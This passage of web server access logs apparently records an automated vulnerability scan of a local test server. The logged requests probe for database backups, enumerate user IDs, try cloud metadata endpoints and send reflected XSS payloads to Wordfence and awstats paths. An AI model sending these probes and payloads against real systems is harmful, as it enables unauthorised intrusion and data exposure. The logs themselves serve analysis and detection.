HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.018","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/74 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"2.083","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/75 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/76 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/77 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.040","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/78 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/79 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.048","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/80 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.047","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/81 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/82 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/83 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.048","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/84 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.043","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/85 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.053","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/86 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/87 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/88 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/89 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/90 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/91 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/92 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/93 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.073","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sqlite HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sqlitedb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.018","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/metadata/instance?api-version=2021-02-01 HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"12.344","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/v1/metadata/private-networks HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"11.178","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/94 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.082","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/95 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/96 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.046","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/97 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/98 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/99 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/100 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.rsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%252f%255cexample.com%252fa%253fb/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libs/granite/core/content/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E 